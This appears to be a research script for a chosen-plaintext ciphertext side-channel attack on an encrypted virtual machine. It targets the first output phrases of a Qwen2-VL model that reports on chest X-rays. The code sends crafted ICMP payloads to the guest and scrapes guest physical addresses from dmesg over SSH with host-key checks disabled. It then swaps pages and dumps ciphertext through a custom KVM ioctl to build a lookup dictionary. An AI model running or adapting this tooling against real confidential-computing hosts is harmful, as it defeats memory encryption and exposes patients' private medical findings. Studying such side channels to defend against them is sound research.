#!/usr/bin/env python3
"""
output_orchestrate.py — Dictionary build for first-output-token side-channel.

Targets the first N output tokens generated by Qwen2-VL.
Uses the same ICMP-page-capture mechanism as orchestrate_v2.py.

Phase 0 (pre-build, run once):
  For each target output token sequence (first generated word):
    send ICMP with prefix alignment → get GPA → dump ciphertext
  Saves output_dict_cache.json + individual *.out files in output_dict_pages/.

  Principle is identical to orchestrate_v2.py build_dict:
    payload = b'\x00' * prefix + (token_bytes repeated to fill 4 KB+)
    guest module reports GPA of the page holding the data
    host captures ciphertext → stored by (token_offset, token_idx)

Usage:
    sudo python3 output_orchestrate.py --print-token-ids   # run on guest first
    sudo python3 output_orchestrate.py --build
    sudo python3 output_orchestrate.py --build --log-file build_output.log
"""

import argparse
import ctypes
import datetime
import fcntl
import json
import os
import re
import subprocess
import sys
import time
from pathlib import Path

# ---------------------------------------------------------------------------
# logging
# ---------------------------------------------------------------------------

_log_fh = None


def log(msg: str = "", file=None) -> None:
    ts  = datetime.datetime.now().strftime("%H:%M:%S")
    out = f"[{ts}] {msg}" if msg and not msg.startswith("  ") else msg
    print(out, file=file or sys.stdout)
    if _log_fh and file is None:
        print(out, file=_log_fh)
        _log_fh.flush()


def log_err(msg: str) -> None:
    log(msg, file=sys.stderr)
    if _log_fh:
        print(msg, file=_log_fh)
        _log_fh.flush()


HERE = Path(__file__).parent

# Reuse existing tools unchanged
SWAP_TOOL   = HERE / "swap_pages_tool"
READ_GPA    = HERE / "read_gpa.py"

OUTPUT_DICT_CACHE = HERE / "output_dict_cache.json"
OUTPUT_DICT_DIR   = HERE / "output_dict_pages"

GUEST_SSH  = "ubuntu@localhost"
GUEST_PORT = "7777"
_sudo_user = os.environ.get("SUDO_USER")
_ssh_key   = (Path(f"/home/{_sudo_user}/.ssh/id_ed25519")
              if _sudo_user else Path.home() / ".ssh/id_ed25519")
SSH_BASE   = [
    "ssh", "-p", GUEST_PORT,
    "-i", str(_ssh_key),
    "-o", "StrictHostKeyChecking=no",
    "-o", "BatchMode=yes",
    "-o", "ConnectTimeout=30",
    GUEST_SSH,
]

# ---------------------------------------------------------------------------
# Output token targets
#
# These are the most common first tokens of the VLM's generated output,
# identified from output_dict.txt analysis (3463 samples):
#
#   "The"         → "The chest x-ray in the image shows..."      (most common)
#   "Here"        → "Here are the key findings:\n\n1."           (12.6%)
#   "Based"       → "Based on the chest x-ray provided..."       (3.5%)
#   "A"           → "A chest x-ray is a medical imaging..."
#   "Unfortunately"→ "Unfortunately, I cannot provide..."
#
# Token IDs must be verified with --print-token-ids on the guest
# (Qwen2-VL tokenizer context: first generated token, no preceding space).
# ---------------------------------------------------------------------------

OUTPUT_TOKEN_LABELS = [
    # (label, token_ids)
    # Multi-token first-sentence phrases verified with --print-phrase-ids.
    # Covers ~30% of all outputs; each phrase has unambiguous medical meaning.
    # Placeholder token_ids below — run --print-phrase-ids on guest to fill in.
    #
    # Frequency from output_dict.txt (3463 samples):
    #   283  "The chest x-ray in the image shows a normal chest with no visible abnormalities."
    #   122  "Based on the chest x-ray provided, the following findings can be observed:\n\n1."
    #   107  "The chest x-ray in the image shows a normal chest with no obvious abnormalities."
    # Excluded: "Here are the key findings:\n\n1." and "a few notable findings:\n\n1."
    # — both are openers without medical content (finding details follow separately).

    ("normal_visible",
     [785, 15138, 856, 29530, 304, 279, 2168, 4933, 264, 4622, 15138, 448, 902, 9434, 74715, 13]),  # 0  16tok/128B

    ("findings_based",
     [28715, 389, 279, 15138, 856, 29530, 3897, 11, 279, 2701, 14613, 646, 387, 13166, 1447, 16, 13]),  # 1  17tok/136B

    ("normal_obvious",
     [785, 15138, 856, 29530, 304, 279, 2168, 4933, 264, 4622, 15138, 448, 902, 8036, 74715, 13]),  # 2  16tok/128B
]

# Phrase strings matching OUTPUT_TOKEN_LABELS order (used by --print-phrase-ids)
OUTPUT_PHRASES = [
    "The chest x-ray in the image shows a normal chest with no visible abnormalities.",
    "Based on the chest x-ray provided, the following findings can be observed:\n\n1.",
    "The chest x-ray in the image shows a normal chest with no obvious abnormalities.",
]

DRAIN_EVERY  = 16
_GPA_TIMEOUT = 60

# ---------------------------------------------------------------------------
# KVM ioctl for ciphertext read (same as orchestrate_v2.py)
# ---------------------------------------------------------------------------

_KVMIO      = 0xAE
_PAGE_SIZE  = 4096
KVM_READ_PAGE_DUMP = (0x80000000
                      | ((_PAGE_SIZE & 0x3FFF) << 16)
                      | (_KVMIO << 8)
                      | 0x2b)

# ---------------------------------------------------------------------------
# helpers
# ---------------------------------------------------------------------------

def ssh(cmd: str, timeout: int = 15) -> str:
    try:
        r = subprocess.run(SSH_BASE + [cmd], capture_output=True, text=True, timeout=timeout)
        return r.stdout + r.stderr
    except subprocess.TimeoutExpired:
        return ""


def run(label: str, cmd: list) -> None:
    log(f"  $ {' '.join(str(c) for c in cmd)}")
    rc = subprocess.run(cmd).returncode
    if rc != 0:
        log_err(f"[!] {label} failed (exit {rc})")
        sys.exit(1)


def _bytes_to_xp_dump(gpa: int, raw: bytes) -> str:
    lines = [f"(qemu) xp /512gx 0x{gpa:x}"]
    for i in range(0, _PAGE_SIZE, 16):
        addr = gpa + i
        lo = int.from_bytes(raw[i:i+8],    "little")
        hi = int.from_bytes(raw[i+8:i+16], "little")
        lines.append(f"{addr:016x}: 0x{lo:016x} 0x{hi:016x}")
    return "\n".join(lines)


def do_swap_read(swap_tool: str, dict_gpa: int, src_gpa: int,
                 out_path: Path, kvm_dev: str = "/dev/kvm") -> None:
    run("swap_pages_tool (swap-back)",
        [swap_tool, f"0x{dict_gpa:x}", f"0x{src_gpa:x}", "--swap-back"])
    kvm_fd = os.open(kvm_dev, os.O_RDWR | os.O_CLOEXEC)
    try:
        buf = ctypes.create_string_buffer(_PAGE_SIZE)
        fcntl.ioctl(kvm_fd, KVM_READ_PAGE_DUMP, buf)
        raw = bytes(buf)
    finally:
        os.close(kvm_fd)
    dump = _bytes_to_xp_dump(dict_gpa, raw)
    out_path.write_text(dump + "\n")
    log(f"  saved → {out_path.name}")


# ---------------------------------------------------------------------------
# ICMP send + GPA acquisition  (uses send_tokens._send_one_quiet directly)
# ---------------------------------------------------------------------------

def _send_and_get_gpa(token_ids: list[int], prefix: int = 0) -> tuple[int, int]:
    """
    Send one ICMP packet with token_ids at given prefix, parse GPA + frag_p1.
    Returns (gpa, frag_p1).  Raises RuntimeError if no GPA found.
    """
    sys.path.insert(0, str(HERE))
    from send_tokens import _send_one_quiet  # type: ignore  # host-only, lazy import

    ssh("sudo dmesg -C")
    _send_one_quiet(token_ids, prefix=prefix)
    time.sleep(1)

    out = ""
    gpas = []
    for attempt in range(3):
        out = ssh("sudo dmesg", timeout=40)
        gpas = re.findall(r"sub-page\[\d+\]\s+GPA=0x([0-9a-f]+)", out, re.IGNORECASE)
        if gpas:
            break
        if attempt < 2:
            time.sleep(3)

    if not gpas:
        raise RuntimeError("[!] No GPA in guest dmesg")

    gpa = int(gpas[-1], 16)
    frag_p1 = 970  # fallback
    m = re.search(r"frag\[0\].*?\boff=(\d+)", out)
    if m:
        frag_off = int(m.group(1))
        frag_p1 = 4096 - (frag_off % 4096) - 8
    return gpa, frag_p1


def _acquire_with_retry(token_ids: list[int], prefix: int = 0,
                        retries: int = 5) -> tuple[int, int]:
    """_send_and_get_gpa with exponential back-off."""
    for attempt in range(retries):
        try:
            return _send_and_get_gpa(token_ids, prefix)
        except RuntimeError as e:
            log_err(f"  {e} (attempt {attempt + 1}/{retries})")
            if attempt < retries - 1:
                wait = 10 * (attempt + 1)
                log(f"  sleeping {wait}s before retry...")
                time.sleep(wait)
    raise RuntimeError(f"_send_and_get_gpa failed after {retries} attempts")


# ---------------------------------------------------------------------------
# Guest ICMP RX buffer drain
# ---------------------------------------------------------------------------

def drain_guest_rxbuf() -> None:
    out = ssh(
        "sudo python3 << 'PYEOF'\n"
        "import socket, select\n"
        "s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n"
        "s.setblocking(False)\n"
        "n = 0\n"
        "while select.select([s], [], [], 0.3)[0]:\n"
        "    try:\n"
        "        s.recv(65536)\n"
        "        n += 1\n"
        "    except OSError:\n"
        "        break\n"
        "s.close()\n"
        "print(f'drained {n} pkts')\n"
        "PYEOF",
        timeout=20,
    )
    log(f"  [drain] {out.strip()}")


# ---------------------------------------------------------------------------
# Phase 0: build output token dictionary
# ---------------------------------------------------------------------------

def build_output_dict(swap_tool: str) -> dict:
    """
    Build phase: one ICMP send per (token_idx, phase) covers all offsets
    at L-byte intervals — identical strategy to orchestrate_v2.py build_dict.

    Since all OUTPUT_TOKEN_LABELS are single tokens (8 B each, L=8),
    n_phases=1 per token and ONE dump covers all 512 offsets on the page.

    Total sends: n_tokens × 3  (2 probes + 1 aligned send each).

    Saves output_dict_cache.json and per-phase files in output_dict_pages/.
    Always rebuilds from scratch (removes existing cache).
    Returns {token_offset_hex: {token_idx_str: {gpa, cp_file, landing_ok}}}.
    """
    OUTPUT_DICT_DIR.mkdir(exist_ok=True)

    if OUTPUT_DICT_CACHE.exists():
        OUTPUT_DICT_CACHE.unlink()
        log("[build] Removed existing output_dict_cache.json")
    for f in OUTPUT_DICT_DIR.glob("*.out"):
        f.unlink()
    log(f"[build] Cleared {OUTPUT_DICT_DIR.name}/ — building from scratch")

    cache: dict = {}

    total_phases = sum(len(ids) for _, ids in OUTPUT_TOKEN_LABELS)
    phase_num    = 0
    drain_count  = 0

    for token_idx, (label, token_ids) in enumerate(OUTPUT_TOKEN_LABELS):
        L        = len(token_ids) * 8   # payload repeat period in bytes
        n_phases = L // 8               # distinct 8-byte-aligned starting positions

        for phase in range(n_phases):
            phase_num      += 1
            target_landing  = phase * 8
            cp_name = f"out_t{token_idx}_p{phase}"
            cp_path = OUTPUT_DICT_DIR / f"{cp_name}.out"

            covered = [target_landing + k * L
                       for k in range(4096 // L + 1)
                       if target_landing + k * L < 4096]

            if cp_path.exists() and all(
                hex(o) in cache and str(token_idx) in cache[hex(o)]
                for o in covered
            ):
                log(f"[build {phase_num}/{total_phases}] token_idx={token_idx} '{label}'"
                    f"  phase={phase}  [skip — {len(covered)} offsets already registered]")
                continue

            log(f"\n[build {phase_num}/{total_phases}] token_idx={token_idx} '{label}'"
                f"  L={L}B  n_phases={n_phases}  phase={phase}"
                f"  target_landing=0x{target_landing:x}"
                f"  covers {len(covered)} offsets")

            drain_count += 1
            if drain_count % DRAIN_EVERY == 0:
                log("  [drain] flushing guest ICMP receive buffer...")
                drain_guest_rxbuf()

            # 2 probes to measure ring-advance delta
            try:
                log("  [probe1] prefix=0 ...")
                _, frag_p1_a = _acquire_with_retry(token_ids, prefix=0)
                log("  [probe2] prefix=0 ...")
                _, frag_p1_b = _acquire_with_retry(token_ids, prefix=0)
            except RuntimeError as e:
                log_err(f"  [!] Probe failed: {e} — skipping phase")
                continue

            delta         = (frag_p1_a - frag_p1_b) % 4096
            expected_frag = (frag_p1_b - delta) % 4096
            prefix        = target_landing + expected_frag
            log(f"  frag_p1: {frag_p1_a},{frag_p1_b}  delta={delta}"
                f"  expected={expected_frag}  prefix={prefix}")

            # Aligned send
            try:
                dict_gpa, actual_frag_p1 = _acquire_with_retry(token_ids, prefix=prefix)
            except RuntimeError as e:
                log_err(f"  [!] Aligned send failed: {e} — skipping phase")
                continue

            actual_landing = (prefix - actual_frag_p1) % 4096
            landing_ok     = (actual_landing == target_landing)
            log(f"  dict_gpa=0x{dict_gpa:x}  actual_frag_p1={actual_frag_p1}"
                f"  actual_landing=0x{actual_landing:x}"
                f"  {'OK' if landing_ok else f'MISMATCH (expected 0x{target_landing:x})'}")

            # Dump full 4 KB page — one dump covers all L-spaced offsets
            run("read_gpa (output dict build)",
                [sys.executable, str(READ_GPA), str(OUTPUT_DICT_DIR / cp_name),
                 f"0x{dict_gpa:x}"])
            log(f"  dump -> {cp_path.name}")

            # Register all offsets where this token lands on the page
            actual_covered = []
            for k in range(4096 // L + 1):
                offset = actual_landing + k * L
                if offset >= 4096:
                    break
                off_key = hex(offset)
                if off_key not in cache:
                    cache[off_key] = {}
                cache[off_key][str(token_idx)] = {
                    "gpa":        hex(dict_gpa),
                    "cp_file":    str(cp_path),
                    "landing_ok": landing_ok,
                }
                actual_covered.append(off_key)
            log(f"  registered {len(actual_covered)} offsets: "
                f"{actual_covered[:4]}{'...' if len(actual_covered) > 4 else ''}")

        # Persist after each token_idx
        with open(OUTPUT_DICT_CACHE, "w") as f:
            json.dump(cache, f, indent=2)

    built = sum(len(v) for v in cache.values())
    log(f"[build] Complete. {built} (offset×token) entries in {OUTPUT_DICT_CACHE}")
    return cache


# ---------------------------------------------------------------------------
# --print-token-ids helper  (run on guest inside vlm conda env)
# ---------------------------------------------------------------------------

def _load_tokenizer(model_id: str = "Qwen/Qwen2-VL-2B-Instruct"):
    try:
        from transformers import AutoProcessor
    except ImportError:
        print("[!] transformers not installed — run on guest inside vlm conda env",
              file=sys.stderr)
        sys.exit(1)
    print(f"Loading tokenizer: {model_id} ...")
    return AutoProcessor.from_pretrained(model_id).tokenizer


def print_phrase_ids() -> None:
    """
    Print Qwen2-VL token IDs for each OUTPUT_PHRASES string.
    Run on guest, then paste the token_ids into OUTPUT_TOKEN_LABELS.
    """
    tokenizer = _load_tokenizer()

    print("\n" + "=" * 70)
    print("OUTPUT_PHRASE token IDs  (paste into OUTPUT_TOKEN_LABELS)")
    print("=" * 70)
    for i, (phrase, (label, _)) in enumerate(zip(OUTPUT_PHRASES, OUTPUT_TOKEN_LABELS)):
        ids = tokenizer.encode(phrase, add_special_tokens=False)
        n_bytes = len(ids) * 8
        print(f"\n  [{i}] label={label!r}")
        print(f"  phrase : {phrase!r}")
        print(f"  ids    : {ids}")
        print(f"  n_tok={len(ids)}  L={n_bytes}B  n_phases={len(ids)}")

    print("\n" + "=" * 70)
    print("Ready-to-paste OUTPUT_TOKEN_LABELS:")
    print("=" * 70)
    print("OUTPUT_TOKEN_LABELS = [")
    for phrase, (label, _) in zip(OUTPUT_PHRASES, OUTPUT_TOKEN_LABELS):
        ids = tokenizer.encode(phrase, add_special_tokens=False)
        n_bytes = len(ids) * 8
        print(f"    ({label!r},")
        print(f"     {ids}),  # {len(ids)}tok/{n_bytes}B")
    print("]")


# ---------------------------------------------------------------------------
# main
# ---------------------------------------------------------------------------

def main() -> None:
    p = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    p.add_argument("--build", action="store_true",
                   help="Pre-build output token dictionary then exit")
    p.add_argument("--print-phrase-ids", action="store_true",
                   help="Print token IDs for OUTPUT_PHRASES and ready-to-paste labels (run on guest)")
    p.add_argument("--swap-tool",  default=str(SWAP_TOOL))
    p.add_argument("--log-file",   default=None,
                   help="Append all log output to this file")
    args = p.parse_args()

    if args.print_phrase_ids:
        print_phrase_ids()
        return

    if not args.build:
        p.error("--build or --print-token-ids required")

    global _log_fh
    if args.log_file:
        _log_fh = open(args.log_file, "a")
        log(f"=== session start  log -> {args.log_file} ===")

    empty = [label for label, ids in OUTPUT_TOKEN_LABELS if not ids]
    if empty:
        log_err(f"[!] OUTPUT_TOKEN_LABELS has empty token_ids for: {empty}")
        log_err("[!] Run --print-phrase-ids on guest and fill in OUTPUT_TOKEN_LABELS first.")
        sys.exit(1)

    total_phases = sum(len(ids) for _, ids in OUTPUT_TOKEN_LABELS)
    total_sends  = total_phases * 3
    log(f"[build] {len(OUTPUT_TOKEN_LABELS)} phrases  "
        f"{total_phases} phases  ~{total_sends} sends total")
    for i, (label, ids) in enumerate(OUTPUT_TOKEN_LABELS):
        log(f"  [{i}] {label!r}  {len(ids)} tok  ids={ids[:4]}{'...' if len(ids)>4 else ''}")

    build_output_dict(args.swap_tool)

    if _log_fh:
        _log_fh.close()


if __name__ == "__main__":
    main()
